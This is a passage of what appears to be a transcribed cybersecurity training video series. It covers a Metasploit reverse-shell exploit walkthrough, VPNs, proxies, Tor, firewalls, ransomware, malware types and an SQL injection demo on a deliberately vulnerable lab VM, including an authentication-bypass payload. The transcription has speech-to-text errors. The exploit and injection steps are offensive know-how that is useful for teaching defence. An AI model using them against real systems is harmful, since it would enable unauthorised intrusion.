is the remote host the victim’s machine so we put in the IP address it asks us for the target URI so that’s the path that we saw set target URI to CGI- bin / status enter now with the exploit we need to find a payload that is going to give us the output that we want so we say show payloads and it will give us a list of all the compatible payloads with this exploit and we want to create a reverse TCP connection which is this so we know it’s a Linux operating system we want this uh payload to be set so set payload press enter that’s the payload coming in show options now that we have set the payload this is the options for the exploit and now we want to set our options for the payloads as well so we are creating a reverse TCP connection which means we are remotely executing code at the victim side and making the victim connect back to our machine which means we need to set up a listener so I need to put my IP address over here set local host or LHOST 192 16871 128 which was our IP address show options again just to ensure everything is fine which looks like it is and we then type in the word exploit so that it will start this attack i can see that it has created a meta session at the victim site and it has opened up a session so if I do a pwd now pwd is a Linux command for present working directory and it will show us that we’ll connect it to where dubdubdub cgi- bin do an ls it will list all the files that’s the status file over there do a cd backslash it will take us to the root of this machine and if you’re someone who is interested in building a career in cyber security that is by graduating from the best universities or a professional who sits to switch careers with cyber security by learning from the experts then try giving a short to simply learns post-graduate programming cyber security with modules from the MIT Schwarzman College of Engineering and the course link is mentioned in the description box that will navigate you to the course page where you can find a complete overview of the program being offered jude is waiting at the airport to hop on her flight back home when she realizes that she missed making an important bank payment she connects her laptop to the public Wi-Fi at the airport and goes ahead to carry out the bank transaction everything goes well and Jude completes her transaction after a couple of days she was wiped off her feet when she learned that her bank account was subjected to a cyber attack and a hefty amount was wiped from her account after getting in touch with the bank authority she learned that her account was hacked at the airport she then realized that the public Wi-Fi she used might have caused her this trouble jude wishes that had her bank transfer escaped the hacker’s eyes she would not have been a victim of a cyber attack bank officials advise her to use a VPN for future transactions especially when connecting to an open or public network like most of us Jude had come across the term VPN several times but didn’t know much about it and little did she think that the repercussions of not using a VPN would be this bad let’s understand how the hacker would have exploited Jude’s transaction in the absence of a VPN in this process Jude’s computer first connects to the internet service provider ISP which provides access to the internet she sends her details to the bank’s server using her IP address internet protocol address or IP address is a unique address that recognizes a particular device be it a laptop or smartphone on the internet when these details pass through the public network the hacker who passively watches the network traffic intercepts it this is a passive cyber attack where the hacker collects Jude’s bank details without being

detected more often or not in such an attack payment information is likely to be stolen the targeted data here are the victim’s username passwords and other personal information such an unsecured connection exposed Jude’s IP address and bank details to the hacker when it passed through the public network so would Jude have been able to secure her transaction with the help of a VPN well yes picture Jude’s bank transaction to be happening in a tunnel that is invisible to the hacker in such a case the hacker will not be able to spot her transaction and that is precisely what a VPN does a virtual private network more often known as VPN creates a secure tunnel between your device and the internet for using a VPN Jude’s first step would be to install softwarebased technology known as the VPN client on her laptop or smartphone that would let her establish a secure connection the VPN client connects to the Wi-Fi and then to the ISP here the VPN client encrypts Jude’s information using VPN protocols data is encrypted to make sure it is secure next the VPN client establishes a VPN tunnel within the public network that connects to the VPN server the VPN tunnel protects Jude’s information from being intercepted by the hacker jude’s IP address and actual location are changed at the VPN server to enable a private and secure connection finally the VPN server connects to Jude’s bank server in the last step where the encrypted message is decrypted this way Jude’s original IP address is hidden by the VPN and the VPN tunnel protects her data from being hacked this explains how VPN makes your data anonymous and secure when it passes through the public network and the difference between a normal connection and a VPN connection after learning about this Jude was certain that she should start using a VPN to carry out her online transactions in the future this is also applicable to each one of us even if you work remotely or connect to public Wi-Fi using a VPN is the safest option in addition to providing a secure encrypted data transfer VPNs are also used to disguise your whereabouts and give you access to regional web content vpn servers act as proxies on the internet this way your actual location cannot be established vpn enables you to spoof your location and switch to a server to another country and thereby change your location for example by doing so you can watch any content on Netflix that might be unavailable for your region meet Jonathan he is an investigative journalist who occasionally researches and publishes news articles contrary to the government’s ideologies on one such occasion he could not access a global news website dealing with uncensored information it seemed his IP was blocked from visiting the news website with his IP blocked Jonathan turned to a popular proxy service that was able to unblock the news website thereby allowing an open internet to all users just like how your friend gives a proxy attendance for you a proxy server serves as a stand-in user to keep the real client private but what is a proxy let’s understand its working by taking a look at how Jonathan was able to access geoblock content without much hassle a proxy server acts as a gateway or intermediary server between a user and its destination website when Jonathan wasn’t able to access the news website he connected his system to a global proxy server once connected the proxy server assigns a new IP address to Jonathan’s system an IP address of a different country where the website is not censored following this process whenever Jonathan visits that website the website administrators see the new IP address assigned via proxy server and sees no reason to deny access to their account once the proxy server is able to access the website it’s passed on to Jonathan’s system via the same channel regarding accessibility to proxy servers you must first set it up on your computer device or network next check the steps required for your computer or network as each operating system has its setup procedures in most cases however setup entails using an automated configuration script there are plenty of free proxy services available on the internet however the safety of such proxies is rarely verified most free proxies will provide an IP address and a relevant port for connection purposes reputed proxy providers like Smart Proxy and Bright Data that run on subscription models will most likely provide credentials to log into when establishing the connection this extra step acts as authentication that verifies an existing subscription on the proxy provider server unlike free providers that are open to all when it comes to hiding IP addresses many people consider a VPN to be the primary solution while that’s true up to some extent there are a few things proxies do differently in the case of VPNs extra encryption is also carried out to create a secure tunnel between the user’s device and a VPN server a VPN is usually much faster more secure thanks to multiple layers of encryption and has little to no downtime proxies tend to be comparatively unsafe with the service owners having the exact IP address of the end user and having no guarantees regarding downtimes and reliability if you want to know more about how VPNs work do watch how Jude could have protected her banking credentials using VPNs in our detailed video linked above now let’s take a small quiz to check how much we have learned what can a VPN connection provide that a proxy service cannot a new IP address b multiple layers of encryption c access to Geobblock content d authentication credentials think about it and leave your answers below in the comments section and three lucky winners will receive Amazon gift vouchers what about the benefits of a proxy service though besides allowing access to blocked content proxies can serve as an efficient firewall system they can also filter content from third party websites allowing control over internet usage in many cases browsing speeds are stabilized compared to vanilla internet thanks to proper optimization of the base proxy server the element of privacy proxies provides is highly lucrative to people looking to hide their actual IP address from as many prying eyes as possible one can easily argue the benefits of using VPNs over proxies for added security measures however a few basic tasks don’t warrant maximum privacy for the user’s side as in other cases for example many consumers worldwide find proxy services more convenient since all major operating systems starting from Windows to Android allow proxy configuration without the hassle of installing new applications as is in the case of a VPN in addition there are services online that function as web proxies allowing users to access block content without any setup from their end they can enter the target URL and the web proxy will route data from its physical server this level of freedom is hard to come by in the case of VPNs making proxies an ideal solution for casual browsing with the next generation of internet exchanges focused on maximum privacy and security a variety of ways have been enforced to maintain them as such censorship has been shifted from the streets to the digital domain it forces the standard citizen to derive alternative ways to maintain anonymity a major weapon in this battle for privacy and security is the to browser an independent browser meant to browse the internet while relaying information through the to network it serves as a meaningful alternative to the standard internet browsing habits to better understand the purpose of this browser and such you must learn about the work of the to network featuring its own routing protocol the TO browser is an easy way to maintain anonymity while browsing without emptying one’s wallet let’s take a look at the topics to be covered today we start at the explanation of what is the to network and its significance in the working of the to browser we take a look at the onion routing protocol and how it transmits the data from the client devices to the to directories in order to circumvent government censorship moving on we learn a few features of the to browser and the distinct advantages the to network provides next we learn the difference between using a VPN and a tour to anonymize internet usage and finally we have a live demonstration of the to browser anonymization features in action let’s move on to learning about the to network to short for the onion router it’s an open-source privacy network that permits users to browse the web anonymously the to was initially developed and solely used by the US Navy to protect sensitive government communications before the network was made publicly available the digital era has disrupted the traditional way of doing things in every sector of the economy the rapid rise in development and innovation of digital products has given way to frequent data breaches and cyber thefts in response consumers are increasingly opting for products that offer data privacy and cyber security to is one such underground network that was implemented for the purpose of protecting users identities the to network is one example of the many emerging technologies that attempt to fill a data privacy void in a digital space plagued by cyber security concerns the to network intercepts the traffic from your browser and bounces a user’s request of a random number of other user IP addresses then the data is passed to the user requested final destination these random users are volunteer devices which are called as nodes or relays the to network disguises your identity by encrypting the traffic and moving it across different to relays within the network the to network uses an onion routing technique for transmitting data hence the original name of onion router to operate within the to network a user has to install the to browser any address or information requested using the browser is transmitted through the to network it has its own feature set which we will be going over later in this video as we discussed already the data passing through the to network must follow a unique protocol known as the onion routing protocol let us learn more about its unique characteristics in our normal network usage the data is transmitted directly the sender has data packets to transmit which is done directly over a line of communication with either a receiving party or a server of some kind however since the data can easily be captured while being transmitted the security of this exchange is not very reliable moreover it becomes very easy to trace the origin of such requests on many occasions websites with questionable and controversial content are blocked from the ISP this is possible since the ISP is able to detect and spy on user information passing through the network apart from ISPs there is a steady chance of your private information being intercepted by hackers unfortunately easy detection of the source and contents of a web request make entire network extremely vulnerable for people who seek anonymity over the internet however in the onion routing protocol things take a longer route we have a sender with the top browser installed on the client system the network sends the information to node 1’s IP address which encrypts the information and passes it on to node 2’s address which performs another encryption and passes it on to node 3 address this is the last address which is also known as the exit node this last node decrypts the encrypted data and finally relays the request to the final destination which can be another device or a server end this final address thinks the request came from the exit node and grants access to it the encryption process across multiple computers repeats itself from the exit node to the original user the to network obiscates user IP addresses from unwanted surveillance by keeping the user’s request untraceable with multiple servers touching the data it makes the tracking very difficult for both ISPs and malicious attackers now that we understand the way to works let us learn more about the to browser the to browser was developed by a nonprofit organization as a part of the to project in 2008 and its first public release was announced the to browser is a browser fork from the popular Firefox that anonymizes your web traffic using the to network if you’re investigating a competitor researching an opposing litigant in a legal dispute or just think it’s creepy for your ISP or the government to know what websites you visit the top browser might be the right solution before the top browser were developed using that network to maintain anonymity was a huge task for everyday consumers starting from the setup to the usage the entire process demanded a lot of knowledge and practice the to browser managed to make it easy for users to traverse the relay servers in to guarantee the privacy of the data exchange a major feature of the to browser is the ability to delete all browser history cookies and tracking data the moment it is closed every new launch of the browser opens an empty slate having your usage habits from being tracked and singled out a major feature that is the highlight of the to network is the availability of onion links only a small portion of the worldwide web is available to the general public we have the deep web that contains links that are not allowed to be indexed by standard search engines like Google and Bing the dark web is a further subset of the deep web which contains onion links to browser gives you access to these onion websites which are only available within the to network onion is a special use tople domain which designates an anonymous onion service which is also known as a hidden service similar to the links of the deep web these onion links provide services like online shopping cryptocurrency and many other products not available in the consumer internet space often being considered as a haven for illegal activities and sales on your links provide both information and assets in a private manner without the risk of spying by authorities browsing the web over to is slower than the clear net due to the multiple layers of encryption some web services also block to users tor browser is also illegal in authoritarian regimes that want to prevent citizens from reading publishing and communicating anonymously journalists and dissidents around the world have embraced store as a cornerstone of democracy and researchers are hard at work at improving towards anonymity properties let us take a look at some of the advantages of using the to browser over standard web browsers the highlight of using the to browser is to maintain anonymity over the internet the cause for such requests can differ from person to person but all of these concern are answered by the to network douting the information via multiple nodes and relay servers make it entirely difficult for the ISP to keep a track of usage data the entire to project is designed to be completely free and open source allowing the code for the browser to be inspected and audited by third parties helps in the early detection of faulty configurations and critical bugs it is present for multiple operating system starting from laptops to mobile devices a number of websites are blocked by governments for a variety of reasons journalists under authoritarian regimes have difficulty in getting the word out regarding the situation since the onion routing protocol transfers data between multiple servers of random countries the domains being blocked become available when used via to usage of these encryption messaging platforms is easily enforced using the to browser which otherwise would have been a difficult task under oppressive circumstances many people believe that a VPN offers the same benefits as the top browser let’s put both of them to the test and see the differences between them coming to the first point of difference to is completely free and open-source all of the code for the browser and the network can be audited and has been cleared for security concerns when it comes to VPN there are many different brands which have open- source clients but the same cannot be said for their counterparts some have partly open source while some have completely locked up their code so that they cannot be stolen further moving on to has multiple relay points in its data transfer protocol between the server and the receiver there are three different IP nodes that number can increase but it’ll always be more than two once the data is passed from the sender it goes through all of those relay points while in the case of a VPN the connection is made from the client device to the VPN server and then to the requested destination there is no other IP node that comes into work here thereby making the connection a onetoone between the client and a VPN as a next point since store handles multiple layers of encryption and the data passes through multiple systems along the way the performance is slow compared to a VPN where the performance is relatively fast due to the less number of nodes the data passes through similarly the multi-layer encryption of to is consistent if you use to browser every single request passes through the same layer of encryption and follows the same routing protocol in the case of a VPN different companies offer different levels of encryption some have multihop some prefer a single onetoone connection and these kind of differences make the choice much more variable finally the nodes and relays being used in the to network are volunteer there is no company holding over them so jurisdiction becomes relatively straightforward whereas in the case of VPNs many such VPNs are hosted by adware companies or are being monitored by central governments to note the usage information now that we have a better understanding of the to browser and its routing let us take a look at how the to browser can anonymize and protect our internet usage on opening up the to browser for the first time this is the page that you’re going to be welcomed with you have the option of connecting to the to network before we start our browsing so let’s press connect and we can see that it is connected coming to the anonymization let’s check my current location on Google Chrome currently is showing as Na’vi Mumbai in Maharashtra if we check the same link on the to browser we should get a different address now every link that we open in the to browser will be little delayed and the speed will be hampered because of the multiple layers of encryption like we discussed now as you can see it’s showing a German IP and the state of Bavaria this is how the anonymization works there is no VPN configured there is no proxy attached it’s straight up the out of the box settings that come inbuilt with the tour browser similarly we have an option of cleaning up the data let’s say if you want to refresh your location and you want to use a different ID for the next browsing session if you just restart it once and you can have to check it again we should be seeing a different country this time as you can see we have Netherlands right now so this is how you can keep refreshing your address you can keep refreshing your host location so that you cannot be tracked when in browsing the internet like we discussed we have some onion links that can only be used on the to network as you can see these kind of links do not open in the Google Chrome browser but once we copy these over to the tour browser as you can see we have opened the hidden wiki which is available only on the tour network this is kind of an alternative Wikipedia website where we can find articles to read and more information to learn similarly we have another onion link over here which is once again available only for the tour browser now these kind of delays are expected but they are a valid compromise because they maintain the anonymity that many people desire similarly we have found a hidden wallet which is a cryptocurrency wallet which is specifically for dark web members this operates over the tour network and this is used by mostly journalists and people who want to anonymize their internet transactions when it comes to dealing money all of the transactions that occur over the to network are almost impossible to track therefore these kind of cryptocurrency wallets are very big on the deep web this is just one example while having multiple different wallets for every single cryptocurrency available imagine our houses without a fence or boundary wall this would make our property easy accessible to trespassers and robbers and place our homes at great risk right hence fencing our property helps safeguard it and keeps trespassers at bay similarly imagine our computers and networks without protection this would increase the probability of hackers infiltrating our networks to overcome this challenge just like how boundary walls protect our houses a virtual wall helps safeguard and secure our devices from intruders and such a wall is known as a firewall firewalls are security devices that filter the incoming and outgoing traffic within a private network for example if you were to visit your friend who lives in a gated community you would first take permission from the security guard the security guard would check with your friend if you should be allowed entry or not if all is well your access is granted on the other hand the security guard would not grant permission to a trespasser looking to enter the same premises here the entry access depends solely on your friend the resident’s discretion the role of the security guard in this case is similar to that of a firewall the firewall works like a gatekeeper at your computer’s entry point which only welcomes incoming traffic that it has been configured to accept firewalls filter the network traffic within your network and analyzes which traffic should be allowed or restricted based on a set of rules in order to spot and prevent cyber attacks your computer communicates with the internet in the form of network packets that hold details like the source address destination address and information these network packets enter your computer through ports the firewall works on a set of rules based on the details of these network packets like their source address a destination address content and port numbers only trusted traffic sources or IP addresses are allowed to enter your network when you connect your computer to the internet there is a high chance of hackers infiltrating your network this is when a firewall comes to your rescue by acting as a barrier between your computer and the internet the firewall rejects the malicious data packet and thus protects your network from hackers on the other hand traffic from trusted websites is allowed access to your network this way the firewall carries out quick assessments to detect malware and other suspicious activities thereby protecting your network from being susceptible to a cyber attack firewalls can either be hardware or software software firewalls are programs installed on each computer this is also called a host firewall meanwhile hardware firewalls are equipments that are established between the gateway and your network links routers are a good example of a hardware firewall besides this there are other types of firewalls designed based on their traffic filtering methods structure and functionality the firewall that compares each outgoing and incoming network packet to a set of established rules such as the allowed IP addresses IP protocols port number and other aspects of the packet is known as a packet filtering firewall if the incoming network traffic is not perfed rules that traffic is blocked a variant of the packet filtering firewall is the stateful inspection firewall these types of firewalls not only examine each network packet but also checks whether or not that network packet is part of an established network connection such firewalls are also referred to as dynamic packet filtering firewalls our next type of firewall is called a proxy firewall this draws close comparison to how you give proxy attendance for a friend like how you take the authority to represent your friend the proxy firewall pretends to be you and interacts with the internet they come between you and the internet and thereby prevents direct connections this protects your devices identity and keeps the network safe from potential attacks only if the incoming data packet contents are protected the proxy firewall transfers it to you they’re also known as application level gateway the firewall can spot malicious actions and block your computer from receiving data packets from harmful sources in addition to preventing cyber attacks firewalls are also used in educational institutions and offices to restrict users access to certain websites or applications it is used to avoid access to unauthorized content it’s the year 2015 and Richard has just finished playing games on his computer after a long gaming session Richard tries to shut it down but find some random text file on the desktop that says ransom note the text file mentioned how a hacking group had encrypted Richard’s game files and private documents and he had to pay a ransom of $500 worth of Bitcoin in a specified Bitcoin address richard quickly checked his files only to see them being encrypted and unreadable this is the story of how the Tesla Crypt ransomware spread in 2015 which affected thousands of gamers before releasing the master key used for encrypting the files so what is ransomware for Richard to be targeted by such an attack he must have installed applications from untrusted sources or clicked an unverified link both of them can function as gateways for a ransomware breach ransomware is a type of malware that encrypts personal information and documents while demanding a ransom amount to decrypt them this ransom payment is mainly done using cryptocurrency to ensure anonymity but can also employ other routes once the files are encrypted or locked behind a password a text file is available to the victim explaining how to make the ransom payment and unlock the files for it just like Richard found the ransom note text file on his desktop even after the money has been paid there’s no guarantee that the hackers will send the decryption key or unlock the files but in certain sensitive situations victims make the payment hoping for the best having never been introduced to ransomware attacks before this gave Richard an opportunity to learn more about this and he began his research on the topic the spread of ransomware mostly starts with fishing attacks to know more about fishing attacks click the link in the button above users tend to click on unknown links received via emails and chat applications promising rewards of some nature once clicked the ransomware files installed on the system that encrypts all the files or blocks access to computer functions they can also be spread via malware transmitted via untrusted application installation or even a compromised wireless network another way to breach a system with ransomware is by using the remote desktop protocol or RDP access a computer can be accessed remotely using this protocol allowing a hacker to install malicious software on the system with the owner unaware of these developments coming to the different types of ransomware first we have locker ransomware which is a type of malware that blocks standard computer functions from being accessed until the payment to the hackers is complete it shows a lock screen that doesn’t allow the victim to use the computer for even basic purposes another type is crypto ransomware which encrypts the local files and documents in the computers once the files are encrypted finding the decryption key is impossible unless the ransomware variant is old and the keys are already available on the internet scareware is fake software that claims to have detected a virus or other issue on your computer and directs you to pay to resolve the problem some types of scareware lock the computer while others simply flood the screen with pop-up alerts without actually damaging files to prevent getting affected by ransomware Richard could have followed a few steps to further enhance his security one must always have backups of their data cloud storage for backup is easy but a physical backup in a hard drive is always recommended keeping the system updated with the latest security patches is always a good idea apart from system updates one must always have reputed antivirus software installed many antivirus software like Kasperski and Bit Defender have anti-ransomware features that periodically check for encryption of private documents when browsing the internet a user must always check for the lock symbol on the address bar which signifies the presence of HTTPS protocol for additional security if a system is infected with ransomware already there is a website no more ransom.org it has a collection of decryption tools for most well-known ransomware packages it can also help decrypt specific encrypted files if the list of anti-ransomware tools didn’t help the victim malware is a malicious software that is programmed to cause damage to a computer system network and hardware devices many malicious programs like Trojan viruses bombs and bots which cause damage to the system are known as malware most of the malware programs are designed to steal information from the targeted user or to steal money from the target by stealing sensitive data let’s take a look at the introduction for two different types of malware virus and Trojan firstly let’s take a look what exactly is a virus program a computer virus is a type of malicious program that on execution replicates itself they get attached to different files and programs which are termed as host programs by inserting their code if the attachment succeeds the targeted program is termed as infected with a computer virus now let’s take a look at the Trojan horse trojan horse program is a program that disguises itself as a legitimate program but harms the system on installation they hide within the attachments and emails then transfer from one system to another they create back doors into our system to allow the cyber criminal to steal our information let’s take a look how they function after getting installed into our system firstly we have virus programs the computer virus must contain two parts to infect the system first is a search routine which locates new files and data that is to be infected by the virus program and the second part is known as the copy routine which is necessary for the program to copy itself into the targeted file which is located by the search routine now let’s take a look at the Trojan horse functioning for Trojan horses entryway into our system is through emails that may look legitimate but may have unknown attachments and when such files are downloaded into the device the Troj program gets installed and infects the system they also infect the system on the execution of infected application or the executable file and attacks the system now that we understand what virus androgensions are let’s understand different types of virus androgens let’s take a look at different types of viruses the first one is known as the boot sector virus this type of virus damages the booting section of the system by infecting the masterboard record which is also known as MBR this damages the boot sector section by targeting the hard disk of the system then we have the macro virus macrovirus is a type of virus that gets embedded into the document related data and is executed when the file is open they also are designed to replicate themselves and infect the system on a larger scale and lastly we have the direct action virus this type of virus gets attached to executable files which on execution activates the virus program and infects the system once the infection of the file is completed they exit the system which is also the reason it is known as a non-resident virus let’s take a look at different types of Trojans the first type of Trojan is the backd dooror Trojan they are designed to create a backdoor in the system on execution of an infected program they provide remote access of a system to the hacker this way the cyber criminal can steal our system data and may use it for illegal activities next we have Cricost Trojan they enter the system by clicking the random pop-ups which we come across on the internet they attempt the user to give their personal details for different transactions or schemes which may provide remote access of a system to the cyber criminal and the last Trojan type is ransom tro this type of Trojan program after entering the system blocks the user from accessing its own system and also affects the system function the cyber criminal demands a ransom from the targeted user for the removal of the Trojan program from the device now that we understand some details regarding viruses and Trojan let’s solve a question the question is Jake was denied access to his system and he wasn’t able to control the data and information in his system now the actual question is what could be the reason behind his systems problem option A macro virus option B ransom Trojan option C back door Trojan give your answers in the comment section now let’s understand how to detect the activity of viruses and Trojan in our system to detect virus or Trojan activity in a system we can refer to the following points for viruses we have slowing down of the system and frequent application freeze shows that the infection of the virus is present in the system then we have the viruses can also steal sensitive data including passwords account details which may lead to unexpected log out from the accounts or corruption of the sensitive data and lastly we have frequent system crashes due to virus infection which damages the operating system for Trojan we have frequent system crashes and system also faces slow reaction time then we have there are more random pop-ups from the system which may indicate Trojan activity and lastly we have modification in the system application and change of the desktop appearance can be also due to the infection of a Trojan program next let’s take a look at a famous cyber attack for virus and a Trojan horse for virus we have the MYOM virus which was identified in the ER 2004 which affected over 50 million systems by creating a network of sending spam emails which was to gain back door access into our systems next for the Trojan horse we have the emote Trojan program which is specifically designed for financial theft and for stealing bank related information next we have few points for how to prevent virus entry or Trojan attack for a system the most basic way of virus protection is to using antivirus and do regular virus scan this will prevent virus entry in the system and also having more than one antivirus provides much better protection then avoid visiting uncertified websites can also prevent virus entry into our system then we have using regular driver updates and system updates to prevent virus entry for Trojan we have using certified softwares from legal sites to prevent any Trojan activity in our system and also avoid clicking random pop-ups that we often see on the internet and lastly using antivirus and firewalls for protection against Trojan horses is a good habit now that we have reached the end of the video let’s take a look what we learned for the first part we saw the main objective of the virus is to harm the data and information in a system whereas for the Trojan we have stealing of the data files and information effect of viruses is more drastic in comparison to the Trojan horses then we have viruses which are non- remote programs whereas Trojan horses are remote accessed and lastly viruses have the ability to replicate itself to harm multiple files whereas Trojan does not have the replication ability so let’s begin with what is SQL injection as the name suggest SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement so SQL stands for structured query language which is a language used by an application to interact with a database now normally this attack is targeted towards a database to extract uh the data that is stored within however the vulnerability does not lie in the database itself the vulnerability will always lie in the application it is the developer’s prerogative of how to develop the application how to configure it to prevent SQL injection queries from happening a database is created to answer questions and if a question is asked it is supposed to answer it database needs to be configured for some amount of security but the vulnerability the flaw here for SQL injection will always lie in the application itself it is how the application interacts with the database that needs to be modified that needs to be maintained by the developer rather than just configuring the database itself so the attacker at this point in time when they send a query to the application will form a malformed query by injecting a particular command or an operator that is recognized by the SQL language and if that operator is passed through the application to the database then the database basically gets cracked or does a data dump because of that unwanted character coming in so this character needs to be filtered at the application level itself now let’s look at a quick demo so what we have done here is I have this virtual machine called OASP broken web applications virtual machine version 1.2 i’m going to power this on till this powers on I’m going to show you where we can download this uh utility from so you can just look for OASP broken web application project download you’ll find it on sourceforge.net click on the link you can download the broken web application project from here this is a 1.9 GB download and you can have a zip machine directly for VMware or Oracle virtual box now this is an application that has been developed by OASP which stands for open web application security project which is a not for-profit organization and uh periodically uh releases the most top 10 risks that an application uh will face for that particular year so they have given a web application uh with inbuilt vulnerabilities for professionals like us to practice upon to develop our skills upon because doing this in the real world is illegal i cannot go onto a website to demonstrate how a SQL injection attack works uh neither should you try your hands on it till you become very well rehearsed with it so till uh to upgrade your skills to upskill yourself please download this machine host it in a VMware workstation or Oracle virtual box and you can u then try your skills on it right so uh just going back to the browser here if I open up uh a new tab you’ll see that this machine has booted up and has an IP address called 71.132 so if I just go onto that IP address and I type in 1926 16871.132 and you’ll see the OASP broken web application project and there are a lot of training applications realistic intentionally vulnerable applications old versions of real applications and so on so forth so there is a lot of applications inbuilt over here that you can try your skills upon you are going to try to use the OAS utility over here uh this gives you the uh OAS top 10 risks for 2010 2013 2017 is the latest one so far uh but the difference between 2013 and 2017 is that some of these have changed but not all of them uh the order has changed a little bit but you can see that SQL injection is on the top A1 amongst the injection attacks right and you can see there are multiple types that have been given here the SQL injection for extracting data or SQL injection for bypass authentication or insert your injection uh uh attacks blind SQL injection and then there is a tool called SQL map which is available freely on your Linux machines Kali Linux or Parrot Linux whichever you want to use uh for your practice targets and so on so forth so if I just take you here for bypass authentication and this is a regular login page that an application may have right you look at a username you look at password you type that in and you log in so let’s say I don’t know a password here I’m just going to type in a username test password is ps I try to log in and it shows me that the account does not exist so the authentication mechanism does work I did try type in a username and password it wasn’t recognized with account does not exist now let’s try to type in a SQL query here i’m going to just give it a single quote which is an operator that is recognized by the SQL language which when uh the database tries to execute uh will cause the database to uh dump some data or to bypass authentication in this case and I’m going to give it a condition single quote or 1= 1 space hyphen space and I’m going to click on login now right now I’m not logged in at all and we tried our username and password and we weren’t able to login so now if I log in you will see that it gave me a status update saying the user has been authenticated and I’m logged in as admin got root so that is what these SQL queries can achieve i’m going to log out right now and uh we’re going to look at the basics of SQL injection so looking at that small demo looking now let’s look at what types of SQL injections are available so the first is inband SQL injection the there are two subtypes within inband error based injection attack and a union based injection attack the second type is blind SQL injection attack where there’s a boolean based and a time based attack and the third one is out ofbound SQL injection attack now what is inband SQL injection attack inband is where we either attempting the error based or the union based what is error based uh we send a query to the database we craft a query to the database and uh it generates an error me message and it dumps the error message right in front of us on the screen that uh makes us realize that there is a flaw and there there is some information that is dumped on the screen which we can then further utilize to craft our further queries as we go ahead whereas union based is the it is where we combine multiple statements at the same time so if you look at the URL earlier in the URL you would see a large structure in that URL uh we can try to add more two or more statements within the URL itself to combine them and then confuse the database into executing both the statements together and giving a data dump at the same time right so what would a error based uh SQL injection look like if I go back to the same database uh which is here right and if you remember the username we gave it a single quote or 1= 1 space – space we gave it the condition right so basically what it did was a single quote is an operator that goes to the database selects the default uh table in the user tables in this database column and then compares it to the condition that is given so the condition that we gave was 1 equals 1 which is always true so what it did was it selected the default uh user table that was available in the database and instead of comparing it to a password it compared it to the condition so if I give it 1 equals 2 where the condition is false and if I log in you will see that the account doesn’t exist comes back again because the condition was false and instead of comparing the user account to the password it basically uh compared the user account to the condition so if I give it a single quote or 1= 1 – space uh and login you can see that this is a correct condition and thus we are able to log in now before we even go uh to that extent if I just forget the condition over here and I just give it a single code the operator and I send this operator to the database and I click on login you will see that it generates an error which is right on top and it tells us the line the uh file where the error happened and you can see it happened in the MySQL handler.php PHP file right and then it gave us the message you have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use now why would a hacker want to do this in the first place because there are different types of databases so there is a MySQL MSQL or Microsoft SQL Oracle SQL IBM DB2 all of these are variations of the SQL database uh they use the SQL language however every database has its own command right they they have their own syntax they have their own uh specific commands that are utilized for the database so in this scenario the hacker wants to identify what database is being currently utilized so they can craft those particular queries so now with this injection with just me sending the quote and the error getting generated I now come to know that we are using a MySQL server and the version of that server is 5.1.73 and uh the rest of the information about uh where the handlers are located and so on so forth right this gives the information to the hacker of how they want to proceed next what kind of queries they want to create what kind of syntax they want to utilize so error based attack is where you generate these kind of errors uh and you get this information the union based is where you craft your queries within the URL or you can try to combine multiple statements within the input fields and try to generate a response from that then we come to boolean based SQL injection uh sends a SQL query to the database which forces the application to return a different result depending on whether the query returns a true or a false result so basically if the input is false the input both the inputs are false the output would be false uh there’s one input that is false the other input that is true input B the output would be true and so on so forth right so depending on the result from the inputs the attacker will come to know which input is true with this he can then access the database of the website so you’re trying to figure out by sending out multiple inputs uh and then analyzing the output to see what exactly uh which command exactly worked what was the resultant output of that command thus from this kind of an information the hacker can infer their next step forward then you have timebased SQL injections uh now there are times when a database administrator or an application administrator has done some security configuration and thus have disabled verbose error messages now what is a verbose error message the error message that we saw right here is a verbose error message that means that the message gives out details the message gives out details about what the database is the version and whatnot so if they have sanitized these errors and you no longer can generate these errors and thus you cannot figure out what database is then what do you do right for example if I just take you to simply learn and take you to a URL that is supposedly not accessible you can see that it gives a generic error oops like it looks like you have crash landed on Mars it doesn’t give you a verbose error that we saw here so this gives us a detail error of what went wrong where it gives us the database the version of the database and uh where the query went wrong and etc etc etc whereas on this side where there’s some there’s a lot of security that goes in here so you can see that it doesn’t generate a error you just get a generic page in front of you so in that case what does a hacker do so the hacker then injects a time based uh query in the URL which allows us to verify whether the command is being executed or not so uh we put in a time weight let’s say 10 seconds of time wait so if we the moment we inject the query if the query times for 10 seconds and then gets executed that means that the SQL injection is possible however if we inject the query and uh it just gets executed without the delay that means that the time uh injection attack would not be uh possible on that particular site out of bound is not a very common attack it depends on the features being enabled on the database management system that is being used by the web application so this can be a somewhat of a misconfiguration error uh by the database administrator where you have enabled functions and not sanitized them so you have not done in uh access controls properly you have not given account control so queries should never be executed at an administrative level they should always be uh executed at a user level with minimum privileges that are required for that query to be executed now if you’re allowing these kind of functions to be uh to be enabled at the DBMS and there is an administrative account that can have access to them at that point in time an out ofbound injection attack is possible so let’s look at how a website works right uh how SQL works on a website now the website is constructed of HTML hypertext markup language uh which would include JavaScripting for functionality cascading stylesheets for the mapping of the website right and then ReactJS and whatnot uh for further functionality now when we send a query to the website it is normally using the HTTP protocol or HTTPS protocol when the query reaches the application the application would then go ahead and generate the SQL query uh at the client side you’ll have uh all these scripting languages coming in uh on the front end uh that we can utilize to craft queries and then send them across at the server side you’ll have uh databases like Oracle MySQL MSQL and so on so forth that will then execute those queries right so just to give you an example if I use a tool called Postman what we generally do uh when we craft a query is we send out a uh get request to the website and then we receive a response from the site uh with the HTML code and everything so this is a tool that is utilized by software testers to test the responses that you’re going to get from various websites so on the left hand side you can see I’ve used it on quite a bit uh here we have a example for gmail.com so let’s continue with that so this is a get request being sent to gmail the moment I send it it’s going to create an HTTP request and send it across the response that I get is this this is the HTML code for gmail.com right these are the cookies uh these are the headers uh that include information so you can see this is a text HTML character set utilized is UTF8 and the configuration uh that has been done with the application right so this is where uh everything comes in this is the cookie that has been sent with that particular uh request that I had sent out now if you analyze this query right so when we went onto this application and I typed in that single quote and we generated this error right uh you can see that the application converted this into a SQL query so the query was select username from accounts where the username in quotes single quotes and we use the quote right the single quote right there so uh that’s where we use that operator and that’s where the exception error occurred so these are the kind of queries that are structured by the application and then taken on to the database for execution when we type in uh it is a HTTP get request with the username and password within that query uh that is sent to the application the application converts it into a SQL query sends it to the database and the database responds with the appropriate response so how do we prevent SQL injection in the first place use prepared statements and parameterized queries uh these statements make sure that the parameters passed into SQL statements are treated in a safe manner so for example we saw that the single quote 